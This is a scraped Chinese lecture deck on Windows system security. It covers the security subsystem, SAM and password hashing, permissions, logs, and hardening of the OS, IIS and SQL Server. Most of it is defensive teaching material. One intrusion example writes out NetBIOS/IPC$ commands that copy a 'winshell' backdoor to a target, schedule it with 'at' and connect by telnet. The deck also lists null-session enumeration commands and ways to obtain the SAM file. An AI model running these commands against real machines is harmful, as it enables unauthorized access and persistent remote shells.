信息安全技术(2).ppt

返回 相似 举报
信息安全技术(2).ppt_第1页
第1页 / 共99页
信息安全技术(2).ppt_第2页
第2页 / 共99页
信息安全技术(2).ppt_第3页
第3页 / 共99页
信息安全技术(2).ppt_第4页
第4页 / 共99页
信息安全技术(2).ppt_第5页
第5页 / 共99页
点击查看更多>>
资源描述:
信息安全技术Windows系统安全,内容,Windows安全原理篇Windows安全管理篇,Windows安全原理篇,,,Windows安全原理篇,Windows系统的安全架构Windows的安全子系统Windows的密码系统Windows的系统服务和进程Windows的日志系统,Windows系统的安全架构,WindowsNT的安全包括6个主要的安全元素Audit(审计),Administration(管理),Encryption(加密),AccessControl(访问控制),UserAuthentication(用户认证),CorporateSecurityPolicy(公共安全策略)。,WindowsNT系统内置支持用户认证、访问控制、管理、审核。,Windows系统的安全组件,访问控制的判断(Discretionaccesscontrol)按照C2级别的定义,Windows支持对象的访问控制的判断。这些需求包括允许对象的所有者可以控制谁被允许访问该对象以及访问的方式。对象重用(Objectreuse)当资源(内存、磁盘等)被某应用访问时,Windows禁止所有的系统应用访问该资源。强制登陆(Mandatorylogon)与WindowsforWorkgroups,Windwows95,Windows98不同,Windows2K/NT要求所有的用户必须登陆,通过认证后才可以访问资源。审核(Auditing)WindowsNT在控制用户访问资源的同时,也可以对这些访问作了相应的记录。对象的访问控制(Controlofaccesstoobject)WindowsNT不允许直接访问系统的某些资源。必须是该资源允许被访问,然后是用户或应用通过第一次认证后再访问。,强制访问控制,Windows安全子系统的组件,安全标识符(SecurityIdentifiers)SID永远都是唯一的,由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。例S-1-5-21-1763234323-3212657521-1234321321-500访问令牌(Accesstokens)。访问令牌是用户在通过验证的时候有登陆进程所提供的,所以改变用户的权限需要注销后重新登陆,重新获取访问令牌。,第一项S表示该字符串是SID,第二项是SID的版本号,对于2000来说,这个就是1,然后是标志符的颁发机构(identifierauthority),对于2000内的帐户,颁发机构就是NT,值是5,然后表示一系列的子颁发机构,前面几项是标志域的,最后一个标志着域内的帐户和组,Windows安全子系统的组件,安全描述符(Securitydescriptors)WindowsNT中的任何对象的属性都有安全描述符这部分。它保存对象的安全配置。访问控制列表(Accesscontrollists)在NT系统中,每当请求一个对象或资源访问时,就会检查它的ACL,确认给用户授予了什么样的权利。每创建一个对象,对应的ACL也会创建。ACL包含一个头部,其中包含有更新版本号、ACL的大小以及它所包含的ACE数量等信息。访问控制项(Accesscontrolentries)访问控制项(ACE)包含了用户或组的SID以及对象的权限。访问控制项有两种允许访问和拒绝访问。拒绝访问的级别高于允许访问。当你使用管理工具列出对象的访问权限时,列表的排序是以文字为顺序的,它并不象防火墙的规则那样由上往下的,不过好在并不会出现冲突,拒绝访问总是优先于允许访问的。,Windows安全子系统,WinlogonGraphicalIdentificationandAuthenticationDLLGINALocalSecurityAuthorityLSASecuritySupportProviderInterfaceSSPIAuthenticationPackagesSecuritysupportprovidersNetlogonServiceSecurityAccountManagerSAM,本地安全认证/授权服务,MS03-026MS03-039,Windows子系统实现图,,Winlogon,LocalSecurityAuthorit以及Netlogon服务在任务管理器中都可以看到,其他的以DLL方式被这些文件调用。,Windows安全子系统,WinlogonandGinaWinlogon调用GINADLL,并监视安全认证序列。而GINADLL提供一个交互式的界面为用户登陆提供认证请求。GINADLL被设计成一个独立的模块,当然我们也可以用一个更加强有力的认证方式(指纹、视网膜)替换内置的GINADLL。Winlogon在注册表中查找\HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon,如果存在GinaDLL键,Winlogon将使用这个DLL,如果不存在该键,Winlogon将使用默认值MSGINA.DLL,Windows安全子系统,本地安全认证(LocalSecurityAuthority)调用所有的认证包,检查在注册表重新找回本地组的SIDs和用户的权限。创建用户的访问令牌。管理本地安装的服务所使用的服务账号。储存和映射用户权限。管理审核的策略和设置。管理信任关系。,Windows安全子系统,安全支持提供者的接口(SecuritySupportProvideInterface)微软的SecuritySupportProvideInterface很简单地遵循RFC2743和RFC2744的定义,提供一些安全服务的API,为应用程序和服务提供请求安全的认证连接的方法。认证包(AuthenticationPackage)认证包可以为真实用户提供认证。通过GINADLL的可信认证后,认证包返回用户的SIDs给LSA,然后将其放在用户的访问令牌中。,Windows安全子系统,安全支持提供者(SecuritySupportProvider)安全支持提供者是以驱动的形式安装的,能够实现一些附加的安全机制,默认情况下,WindowsNT安装了以下三种Msnsspc.dll微软网络挑战/反应认证模块Msapsspc.dll分布式密码认证挑战/反应模块,该模块也可以在微软网络中使用Schannel.dll该认证模块使用某些证书颁发机构提供的证书来进行验证,常见的证书机构比如Verisign。这种认证方式经常在使用SSL(SecureSocketsLayer)和PCT(PrivateCommunicationTechnology)协议通信的时候用到。,Windows安全子系统,网络登陆(Netlogon)。安全账号管理者(SecurityAccountManager)安全账号管理者,也就是我们经常所说的SAM,它是用来保存用户账号和口令的数据库。,Windows2000本地登陆过程,,Windows的密码系统,windowsNT及win2000中对用户帐户的安全管理使用了安全帐号管理器securityaccountmanager的机制,安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。,Windows的密码系统,安全账号管理器的具体表现就是SystemRoot\system32\config\sam文件。在正常设置下仅对system是可读写的。,用户权利、权限和共享权限,网络安全性依赖于给用户或组授予的能力权力在系统上完成特定动作的授权,一般由系统指定给内置组,但也可以由管理员将其扩大到组和用户上。权限可以授予用户或组的文件系统能力。共享用户可以通过网络使用的文件夹。,Windows系统的用户权利,权利适用于对整个系统范围内的对象和任务的操作,通常是用来授权用户执行某些系统任务。当用户登录到一个具有某种权利的帐号时,该用户就可以执行与该权利相关的任务。下面列出了用户的特定权利Accessthiscomputerfromnetwork可使用户通过网络访问该计算机。Addworkstationtoadomain允许用户将工作站添加到域中。Backupfilesanddirectories授权用户对计算机的文件和目录进行备份。Changethesystemtime用户可以设置计算机的系统时钟。Loadandunloaddevicedrive允许用户在网络上安装和删除设备的驱动程序。Restorefilesanddirectories允许用户恢复以前备份的文件和目录。Shutdownthesystem允许用户关闭系统。,Windows系统的用户权限,RWXDPO,Windows系统的用户权限,权限适用于对特定对象如目录和文件(只适用于NTFS卷)的操作,指定允许哪些用户可以使用这些对象,以及如何使用(如把某个目录的访问权限授予指定的用户)。权限分为目录权限和文件权限,每一个权级别都确定了一个执行特定的任务组合的能力,这些任务是ReadR、cuteX、WriteW、DeleteD、SetPermissionP和TakeOwnershipO。下表显示了这些任务是如何与各种权限级别相关联的。,Windows系统的用户权限,目录权限,如果对目录有cuteX权限,表示可以穿越目录,进入其子目。,Windows系统的用户权限,文件权限,Windows系统的共享权限,共享只适用于文件夹(目录),如果文件夹不是共享的,那么在网络上就不会有用户看到它,也就更不能访问。网络上的绝大多数服务器主要用于存放可被网络用户访问的文件和目录,要使网络用户可以访问在NTServer服务器上的文件和目录,必须首先对它建立共享。共享权限建立了通过网络对共享目录访问的最高级别。,Windows系统的共享权限,下表列出从最大限制到最小限制的共享权限。共享权限,共享点一定要小心地分配。因为权限仅仅是分配给共享点的,任何共享点下的文件或目录都足以和共享点本身相同的权限被访问的。,Windows的系统服务,单击“开始”,指向“设置”,然后单击“控制面板”。双击“管理工具”,然后双击“服务”。在列表框中显示的是系统可以使用的服务。Windows2k下可以在命令行中输入services.msc打开服务列表。,Windows的系统服务,服务包括三种启动类型自动,手动,已禁用。自动-Windows2000启动的时候自动加载服务手动-Windows2000启动的时候不自动加载服务,在需要的时候手动开启已禁用-Windows2000启动的时候不自动加载服务,在需要的时候选择手动或者自动方式开启服务,并重新启动电脑完成服务的配置双击需要进行配置的服务,出现下图所示的属性对话框,Windows的系统服务,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Service底下每一笔服务项目子项都有一个Start数值,这个数值的内容依照每一个服务项目的状况而又有不同。Start数值内容所记录的就是服务项目驱动程式该在何时被加载。目前微软对Start内容的定义有0、1、2、3、4等五种状态,0、1、2分别代表Boot、System、AutoLoad等叁种意义。而Start数值内容为3的服务项目代表让使用者以手动的方式载入Loadondemand,4则是代表停用的状态,也就是禁用。,Windows的系统进程,基本的系统进程smss.SessionManager会话管理csrss.子系统服务器进程winlogon.管理用户登录services.包含很多系统服务lsass.管理IP安全策略以及启动ISAKMP/OakleyIKE和IP安全驱动程序。系统服务svchost.包含很多系统服务spoolsv.将文件加载到内存中以便迟后打印。系统服务explorer.资源管理器internat.输入法,Windows的Log系统,Windows有三种类型的事件日志系统日志跟踪各种各样的系统事件,比如跟踪系统启动过程中的事件或者硬件和控制器的故障。应用程序日志跟踪应用程序关联的事件,比如应用程序产生的象装载DLL(动态链接库)失败的信息将出现在日志中。安全日志跟踪事件如登录上网、下网、改变访问权限以及系统启动和关闭。注意安全日志的默认状态是关闭的。,Windows的Log系统,日志在系统的位置是SYSTEMROOT\system32\config\SysEvent.EvtSYSTEMROOT\system32\config\SecEvent.EvtSYSTEMROOT\system32\config\AppEvent.EvtLOG文件在注册表的位置是HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog,Windows的应用系统日志,Internet信息服务FTP日志默认位置systemrootsystem32logfilesmsftpsvc1,默认每天一个日志Internet信息服务WWW日志默认位置systemrootsystem32logfilesw3svc1,默认每天一个日志FTP日志和WWW日志文件名通常为ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日产生的日志,用记事本就可直接打开Scheduler服务日志默认位置systemrootschedlgu.txt,FTP日志分析,FTP日志分析,如下例SoftwareMicrosoftInternetInationServices5.0(微软IIS5.0)Version1.0(版本1.0)Date20001023031155(服务启动时间日期)031155127.0.0.1[1]USERadministator331(IP地址为127.0.0.1用户名为administator试图登录)031158127.0.0.1[1]PASS–530(登录失败)031204127.0.0.1[1]USERnt331(IP地址为127.0.0.1用户名为nt的用户试图登录)031206127.0.0.1[1]PASS–530(登录失败)031232127.0.0.1[1]USERadministrator331(IP地址为127.0.0.1用户名为administrator试图登录)031234127.0.0.1[1]PASS–230(登录成功)031241127.0.0.1[1]MKDnt550(新建目录失败)031245127.0.0.1[1]QUIT–550(退出FTP程序)从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了3次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间IP地址以及探测的用户名。,HTTP的日志分析,HTTP日志分析,如下例SoftwareMicrosoftInternetInationServices5.0Version1.0Date20001023030931FieldsdatetimecipcsusernamesipsportcscsuristemcsuriqueryscstatuscsUserAgent20001023030931192.168.1.26192.168.1.3780GET/iisstart.asp200Mozilla/4.0compatible;MSIE5.0;Windows98;DigExt20001023030934192.168.1.26192.168.1.3780GET/pagerror.gif200Mozilla/4.0compatible;MSIE5.0;Windows98;DigExt通过分析第六行,可以看出2000年10月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;MSIE5.0;Windows98DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间,Windows安全管理篇,,,Windows安全管理篇,Windows系统安装系统安全检查系统安全配置IIS安全配置SQLServer口令和补丁,Windows系统安装,使用正版可靠安装盘将系统安装在NTFS分区上系统和数据要分开存放在不同的磁盘最小化安装服务安全补丁合集和相关的Hotfix装其它的服务和应用程序补丁每次在安装其它程序之后,重新应用安全补丁,防止病毒,进行文件系统安全设置,最少建立两个分区,一个系统分区,一个应用程序分区,因为微软的IIS经常会有泄漏源码/溢出的漏洞,如果把系统和IIS放在同一个驱动器会导致系统文件的泄漏甚至入侵者远程获取ADMIN。,NT安装SP6a和相关的HotfixWIN2K安装SP4和相关的HotfixWINXP安装SP2和相关的HotfixWIN2003安装相关的Hotfix,系统安全检查,系统信息补丁安装情况帐号和口令网络与服务文件系统日志审核安全性增强,系统信息,检查服务器是否安装多系统,多系统无法保障文件系统的安全,从“operatingsystems”字段可以查到允许启动的系统列表,系统信息,查看主机路由信息,补丁安装情况,检查当前主机所安装的ServicePack以及HotfixMbsa,SP版本,IE版本,请确认在Hotfix中是否存在IESP1补丁信息,Hotfix信息,43,帐号和口令,多数的系统,口令是进入系统的第一道防线,也是唯一防线;决大多数的口令算法是可靠的;获得口令的方式有多种;口令问题多数出在管理与安全意识的问题上。,44,口令问题1弱口令,用户趋向于选择容易的口令,即空口令;用户会选择易于记住的东西做口令Test、Password、guest、username等名字、生日、简单数字等易于选择该系统的应用Ntserver、orancle等多数用户的安全意识薄弱,45,口令问题2明文传输,使用明文密码传送的应用FTP、POP、Telnet、HTTP、SNMP、SocksMountd、Rlogin、NNTP、NFS、ICQ、IRC、PcAnywhere、VNC等MSSQL、Oracle等上诉服务都容易成为攻击对象,46,口令攻击的方式,手工猜测;方法社会工程学、尝试默认口令自动猜测;工具NAT、LC等窃听登陆、网络截获、键盘监听工具Dsniff、SnifferPro、IKS等,47,Windows常见的口令问题,NT/2000的口令问题;用户教育的问题;管理员注意事项。,48,NT/2000的口令问题,SAM(SecurityAccountsManagerLanManager散列算法(LM)已被破解,但仍被保留NT散列算法(NTLM/NTLMv2)强加密、改良的身份认证和安全的会话机制自动降级,49,NT/2000的口令问题,LanManager散列算法的问题口令都被凑成14个字符;不足14位的,用0补齐;全部转化为大写字母;分成两部分分别加密。举例Ba01cK28tr-BA01CK2和8TR0000,50,NT/2000的口令问题,SAM数据存放位置systemroot\system32\config\samsystemroot\repair\sam._NTRdisksystemroot\repair\sam(2000)ntbackup注册表HKEY_LOCAL_MACHINE\SAM\SAM和HKEY_LOCAL_MACHINE\SECURITY\SAM仅对system是可读写的,51,NT/2000的口令问题,获取SAM数据的方法使系统自举到另外的系统,copySAM文件;从repair目录攫取备份的SAM;窃听口令交换,52,口令策略,,使用密码强度及账户老化、锁定策略;设置最小的密码程度为8个字符,最短密码时间为1-7天,最长密码时间为42天,最小的密码历史轮回为6,失败登陆尝试为3,账户锁定为60分钟等。,53,用户教育,口令禁忌不要选择可以在任何字典或语言中找到的口令不要选择简单字母组成的口令不要选择任何指明个人信息的口令不要选择包含用户名或相似类容的口令不要选择短于6个字符或仅包含字母或数字的口令不要选择作为口令范例公布的口令,54,管理员注意事项,确保每个用户都有一个有效的口令;对用户进行口令教育;使用防止用户选择弱口令的配置与工具;进行口令检查,确保没有弱口令;确保系统与网络设备没有缺省账号和口令;不要在多个机器上使用相同的口令;从不记录也不与他人共享密码;,55,管理员注意事项,从不将网络登录密码用作其他用途;域Administrators账户和本地Administrators帐户使用不同的密码;小心地保护在计算机上保存密码的地方;对于特权用户强制30天更换一次口令,一般用户60天更换;使用VPN、SSH、一次性口令等安全机制.,NullSession,NullSession(空连接)连接也称为匿名登陆,这种机制允许匿名用户通过网络获得系统的信息或建立未授权的连接。它常被诸如explorer.的应用来列举远程服务器上的共享。非授权主机可以是网络里所有的主机,即这个主机不需要有访问服务器的任何权限。任何一台主机都可以和服务器之间建立一个NULLsession,这个NULLsession在服务器里属于everyone组。缺省情况下所有的用户都属于everyone这个组。everyone组没有很大的权力。但是可以利用它获取系统的用户信息。,NullSession,netuse\\server\IPC““/user““此命令用来建立一个空会话获得目标上的所有用户列表。包括服务器上有哪些组和用户。服务器的安全规则,包括帐户封锁、最小口令长度、口令使用周期、口令唯一性设置等。列出共享目录。读注册表。,NullSession,netview\\server此命令用来查看远程服务器的共享资源nettime\\server此命令用来得到一个远程服务器的当前时间。At\\server此命令用来得到一个远程服务器的调度作业,防御办法,屏蔽135-139,445端口(网络属性)去除NetBiosOverTCP/IP在服务中去除server)修改注册表HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSAValueNameRestrictAnonymousDataTypeREG_DWORDValue1(2Win2000参考KBarticlesQ143474,Q143475,Q161372,Q155363,Q246261,第六节入侵实例,通过NetBIOS入侵139端口是NetBIOSSession端口,用来进行文件和打印共享,是NT潜在的危险。1、用NBTSTAT命令,用来查询NetBIOS信息。Cnbtstat–Ax.x.x.x2、用netuse建立连接cnetuse\\x.x.x.x\ipc“密码”/user”用户名”cnetview\\x.x.x.xcnetusex\\x.x.x.x\ccdirx/p注意通过IPC连接会在Eventlog中留下记录。,,copywinshell.\\192.168.0.7\admin\system32at\\192.168.0.71155winshell.54088telnet192.168.0.754088,帐号和口令,是否有密码过期策略密码过期策略包括密码最长存留期和最短存留期,最长存留期是指密码在多久后过期,最短存留期是指在多久后才可以修改密码开始|程序|管理工具|本地安全设置|安全设置|帐户策略|密码策略密码最长存留期,以天为单位,MAXDAYS天后密码过期,缺省为42天(建议不超过42天)密码最短存留期,以天为单位,MINDAYS天后才可以修改密码,缺省为0(建议17天),帐号和口令,检查Guest帐号Guest帐号是一个容易忽视的帐号,黑客可能修改该帐号权限,并利用该帐号登陆系统,没有激活,帐号和口令,系统是否使用默认管理员帐号默认管理员帐号可能被攻击者用来进行密码暴力猜测,建议修改默认管理员用户名。,Administrator用户名已被修改,帐号和口令,是否存在可疑帐号查看系统是否存在攻击者留下的可疑帐号,或检查主机操作人员遗留下的尚未删除的帐号。可禁用不需要帐号,帐号和口令,检查系统中是否存在脆弱口令系统存在脆弱口令帐号可能导致攻击者轻易猜出帐号密码。强壮口令要求8位或以上口令长度、大小写字母、数字、特殊符号,网络与服务,查看网络开放端口,查看监听端口,网络与服务,得到网络流量信息,网络与服务,检查主机端口、进程对应信息Fport--,网络与服务,查看系统已经启动的服务列表,网络与服务,查看主机是否开放了共享或管理共享未关闭。,文件系统,查看主机磁盘分区类型服务器应使用具有安全特性的NTFS格式,而不应该使用FAT或FAT32分区。开始|管理工具|计算机管理|磁盘管理,文件系统,检查特定文件的文件权限对于一些敏感文件权限需要进行修改,避免文件被恶意用户执行。,仅适用于NTFS分区,文件系统,检查特定目录的权限在检查中一般检查各个磁盘根目录权限、Temp目录权限,日志审核,检查主机的审核情况开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|审核策略,日志审核,检查系统日志大小、覆盖天数开始|运行|eventvwr|右键“系统”,可设置更大的空间存储日志,如果空间足够,建议手动清除日志,安全性增强,保护注册表,防止匿名访问默认权限并不限制对注册表的远程访问。只有管理员才应具有对注册表的远程访问权限,因为默认情况下Windows2000注册表编辑工具支持远程访问。对匿名连接的额外限制默认情况下,Windows系统允许匿名用户枚举主机帐号列表,获得一些敏感信息。开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项建议设置为“不允许枚举SAM帐号和共享”,安全性增强,检查是否登陆时间用完后自动注销用户开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项是否显示上次成功登陆的用户名开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项,安全性增强,是否允许未登陆系统执行关机命令开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项仅登陆用户允许使用光盘开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项,系统安全配置,补丁安装帐号、口令策略修改网络与服务安全性增强文件系统安全性增强日志审核增强安全性增强,补丁安装,使用Windowsupdate安装最新补丁手工安装补丁,帐号、口令策略修改,推荐修改为设置帐号策略后可能导致不符合帐号策略的帐号无法登陆,需修改帐号密码(注管理员不受帐号策略限制,但管理员密码应复杂),网络与服务安全性增强,卸载不需要的服务开始|设置|控制面板|添加/删除程序|Windows组件,卸载不需要的服务避免未知漏洞给主机带来的风险,网络与服务安全性增强,将暂时不需要开放的服务停止开始|运行|services.msc|将上述服务的启动类型设置为手动并停止上述服务避免未知漏洞给主机带来的风险,文件系统安全性增强,限制特定执行文件的权限未对敏感执行文件设置合适的权限建议禁止Guest组用户访问资源,日志审核增强,建议安全策略文件修改下述值对系统事件进行审核,在日后出现故障时用于排查故障。,日志审核增强,调整事件日志的大小、覆盖策略增大日志大小,避免由于日志文件容量过小导致日志记录不全,安全性增强,禁止匿名用户连接HKLM\SYSTEM\CurrentControlSet\Control\Lsa“restrictanonymous”的值为0,将该值修改为“1”可以禁止匿名用户列举主机上所有用户、组、共享资源删除主机管理共享HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters,增加“Autoshareserver”项,并设置该值为“1”删除主机因为管理而开放的共享,安全性增强,禁止匿名用户连接HKLM\SYSTEM\CurrentControlSet\Control\Lsa“restrictanonymous”的值为0,修改为“1”可以禁止匿名用户列举主机上所有用户、组、共享资源限制Guest用户权限禁止Guest帐号本地登录和网络登录的权限。避免Guest帐号被黑客激活作为后门,IIS服务安全配置,禁用或删除所有的示例应用程序示例只是示例;在默认情况下,并不安装它们,且从不在生产服务器上安装。请注意一些示例安装,它们只可从http//localhost或127.0.0.1访问;但是,它们仍应被删除。下面列出一些示例的默认位置。示例虚拟目录位置IIS示例\IISSamplesc\inetpub\iissamplesIIS文档\IISHelpc\winnt\help\iishelp数据访问\MSADCc\programfiles\commonfiles\system\msadc,IIS服务安全配置,启用或删除不需要的COM组件某些COM组件不是多数应用程序所必需的,应加以删除。特别是,应考虑禁用文件系统对象组件,但是要注意这将也会删除Dictionary对象。切记某些程序可能需要您禁用的组件。例如,SiteServer3.0使用FileSystemObject。以下命令将禁用FileSystemObjectregsvr32scrrun.dll/u删除IISADMPWD虚拟目录该目录可用于重置WindowsNT和Windows2000密码。它主要用于Intranet情况下,并不作为IIS5的一部分安装,但是IIS4服务器升级到IIS5时,它并不删除。如果您不使用Intranet或如果将服务器连接到Web上,则应将其删除。,IIS服务安全配置,删除无用的脚本映射IIS被预先配置为支持常用的文件名扩展如.asp和.shtm文件。IIS接收到这些类型的文件请求时,该调用由DLL处理。如果您不使用其中的某些扩展或功能,则应删除该映射,步骤如下打开Internet服务管理器。右键单击Web服务器,然后从上下文菜单中选择“属性”。主属性选择WWW服务|编辑|主目录|配置,IIS服务安全配置,基于Web的密码重设.htrInternet数据库连接器(所有的IIS5Web站点应使用ADO或类似的技术).idc服务器端包括.stm、.shtm和.shtmlInternet打印.printer索引服务器.htw、.ida和.idq,IIS服务安全配置,设置适当的IIS日志文件ACL请确保IIS产生的日志文件systemroot\system32\LogFiles上的ACL是Administrators(完全控制)System(完全控制)EveryoneRWC这有助于防止恶意用户为隐藏他们的踪迹而删除文件。设置适当的虚拟目录的权限请确保IIS的虚拟目录如scripts等权限设置是否最小化,删除不需要的目录。将iis目录重新定向不要使用系统默认的路径,自定义WEB主目录路径并作相应的权限设置。使用专门的安全工具微软的IIS安全设置工具IISLockTool;是针对IIS的漏洞设计的,可以有效设置IIS安全属性。,SQLServer口令,设置强壮的SQLServerSA口令口令策略8位或更高位数口令,包含大小写字母、数字和特殊符号,SQLServer补丁查询,用Isql或者SQL查询分析器登录到SQLServer,如果是用Isql,请在窗口输入isql-Usa,然后输入密码,进入;如果是用SQL查询分析器,请从程序中启动,输入sa和密码(也可以用windows验证)。在ISQL中输入SelectVersion;go或者SQL查询分析器中输入其实如果不想输入,只要打开帮助的关于就可以了SelectVersion;然后按执行;,SQLServer补丁查询,返回SQL的版本信息,如下MicrosoftSQLServer2000-8.00.760IntelX86Dec172002142205Copyrightc1988-2003MicrosoftCorporationEnterpriseEditiononWindowsNT5.0Build2195ServicePack3其中的8.00.760就是SQLServer的版本和补丁号。对应关系如下8.00.194SQLServer2000RTM8.00.384SP18.00.534SP28.00.760SP3,长期的系统维护,时刻注意安全漏洞和补丁发布定期分析日志系统,发现潜在攻击注意账号和口令的安全问题注意观察系统异常管理员,才是关键,QA,
展开阅读全文

资源标签

最新标签

长按识别或保存二维码,关注学链未来公众号

copyright@ 2019-2020“矿业文库”网

矿业文库合伙人QQ群 30735420